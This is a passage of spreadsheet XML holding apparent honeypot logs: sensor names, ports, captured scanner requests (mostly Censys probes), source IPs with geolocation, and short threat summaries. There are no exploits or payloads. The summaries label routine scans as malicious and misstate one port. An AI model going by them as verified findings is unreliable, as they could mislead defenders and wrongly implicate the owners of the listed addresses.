mp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H26&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_IPP_H14&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_SIP_H21&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_IRC_H6&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_IRC_H45&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_IPP_H27&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IPP_H36&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_IPP_H30&amp;&amp;SMA-LAB_SOCKS5_H9&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_MSSQL_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;80&amp;&amp;389&amp;&amp;631&amp;&amp;6667&amp;&amp;110&amp;&amp;443&amp;&amp;1521&amp;&amp;23&amp;&amp;5432&amp;&amp;25&amp;&amp;NA&amp;&amp;35270&amp;&amp;3306&amp;&amp;6379&amp;&amp;143&amp;&amp;1080&amp;&amp;5900&amp;&amp;64758&amp;&amp;1433&amp;&amp;3389&amp;&amp;42456&amp;&amp;50884&amp;&amp;21&amp;&amp;58622&amp;&amp;43882&amp;&amp;43832</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;request&amp;&amp;login&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=58318'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.117.64:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.117.64:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=53691'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '154.93.37.45:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.93.37.45:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=57071'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=42614'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,37018)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=32770'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,60964)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=43773'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.79.122:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://66.94.127.183:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,44308)}&amp;&amp;{Data_HTTPS:{'Host': '194.233.76.135:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '109.123.229.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': 'vmi1321974.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': 'vmi1321974.contaboserver.net', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,38466)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,48884)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.112;rport=44779'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '94.131.113.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.113.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.112,43120)}</t>
  </si>
  <si>
    <t>::ffff:a75e:8a70</t>
  </si>
  <si>
    <t>The observed activity suggests a malicious reconnaissance and scanning of various network services, with potential attempts to exploit vulnerabilities or gain unauthorized access. The attackers are likely using these protocols to gather information about the target system's services, versions, and configurations. &amp;&amp; A suspicious incoming network connection has been detected from IP address 167.94.138.112 to the SMB service, possibly an attempt at unauthorized access or exploitation. This could be a scanning activity or a prelude to a potential security breach through the SMB service. Further investigation is needed to determine the intent and scope of this activity. &amp;&amp; A suspicious SMB connection attempt was made from an external IP address (167.94.138.112) to port 14320. The source IP does not match any known device on the network. This may indicate a potential attack or unauthorized access attempt. &amp;&amp; This suggests that there is currently no recorded malicious activity. &amp;&amp; Unsuccessful attempt to access Redis service, potentially an enumeration or scanning activity for vulnerabilities. The lack of further information suggests the action was likely reconnaissance rather than exploitation. This may be indicative of preparation for future attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; SMB Scan &amp;&amp; SMB Attack</t>
  </si>
  <si>
    <t>cf887343e55fe36e1fce3fb8d47c78c7</t>
  </si>
  <si>
    <t>103.249.19.90</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43</t>
  </si>
  <si>
    <t>Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>Trenggalek</t>
  </si>
  <si>
    <t>1623251</t>
  </si>
  <si>
    <t>-8.0764</t>
  </si>
  <si>
    <t>111.706</t>
  </si>
  <si>
    <t>150206</t>
  </si>
  <si>
    <t>PT Rafa Teknologi Solusi</t>
  </si>
  <si>
    <t>2022-09-12</t>
  </si>
  <si>
    <t>IDNIC-RAFATEK-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.249.19.90,64590)}&amp;&amp;{Data_SMB:Incoming connection (103.249.19.90,65183)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67f9:135a</t>
  </si>
  <si>
    <t>900a5c75b44e7aed01b944651e552f9b</t>
  </si>
  <si>
    <t>59.183.164.12</t>
  </si>
  <si>
    <t>::ffff:3bb7:a40c</t>
  </si>
  <si>
    <t>d2a48feccada602eac0517fcea7a474b</t>
  </si>
  <si>
    <t>117.209.86.20</t>
  </si>
  <si>
    <t>Multiplay-Prepaid</t>
  </si>
  <si>
    <t>::ffff:75d1:5614</t>
  </si>
  <si>
    <t>8becce6e3f775f26694be8ad620429be</t>
  </si>
  <si>
    <t>206.83.127.108</t>
  </si>
  <si>
    <t>SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>21</t>
  </si>
  <si>
    <t>CK</t>
  </si>
  <si>
    <t>Cook Islands</t>
  </si>
  <si>
    <t>Rarotonga</t>
  </si>
  <si>
    <t>Avarua</t>
  </si>
  <si>
    <t>4035715</t>
  </si>
  <si>
    <t>-21.2129</t>
  </si>
  <si>
    <t>-159.782</t>
  </si>
  <si>
    <t>14593</t>
  </si>
  <si>
    <t>SPACEX-STARLINK</t>
  </si>
  <si>
    <t>SpaceX Starlink</t>
  </si>
  <si>
    <t>{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:ce53:7f6c</t>
  </si>
  <si>
    <t>ad42a035b37795da23a6cb6a3dda4d5b</t>
  </si>
  <si>
    <t>175.203.245.204</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>::ffff:afcb:f5cc</t>
  </si>
  <si>
    <t>f862e5b2535637dcea06bafdd0f0680a</t>
  </si>
  <si>
    <t>205.210.31.76</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H10&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_NTP_H5&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_ORACLE_H33</t>
  </si>
  <si>
